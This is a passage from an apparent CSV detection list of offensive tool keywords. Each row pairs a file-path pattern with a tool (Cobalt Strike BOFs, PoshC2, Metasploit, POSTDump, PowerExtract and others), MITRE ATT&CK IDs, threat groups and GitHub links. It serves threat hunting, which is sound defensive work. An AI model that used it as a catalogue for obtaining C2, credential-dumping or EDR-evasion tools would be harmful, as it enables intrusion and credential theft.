Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/PKINITtools*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*/Plazmaz/LNKUp*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/PoC/PrivilegeEscalation*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*/POC_DLL.vcxproj*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/PoC-CVE-2023-21554*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*/poisoners/*.py,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*/pop3-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pop3-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pop3-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/popCalc.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/PortBender/*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*/portscan.cna*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/portscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/port-states.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/POSeidon.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/posh.key*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 
- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/PoshC2*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/poshc2-*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/PoshC2/*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-config*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-log*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-project*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-server*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used 
to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-stop-service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/posh-update*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - 
a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/post_exploitation*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PostDump.exe*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*/POSTDump.git*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,1,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*/postLegit/grkg*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/postLegit/qhwl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/PowerBruteLogon*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*/PowerExtract.git*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*/PowerExtract.git*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*/powerfun.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/powerglot/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/powerloader.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Powermad.git*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*/power-pwn.git*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*/PowerSCCM.git*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*/PowerSharpPack.git*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*/powershell/process_injection/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion 
Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/powershell_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/PowershellKerberos.git*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,1,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*/PowerShx.git*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*/PowerTools*,offensive_tool_keyword,empire,Empire power tools like powerview powerbreach powerpick powerup,T1003 - T1078 - T1059 - T1069,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Information Gathering,https://github.com/PowerShellEmpire/PowerTools,1,0,N/A,N/A,10,1931,826,2021-12-28T21:00:42Z,2014-03-06T14:49:51Z -*/PowerView.cna*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
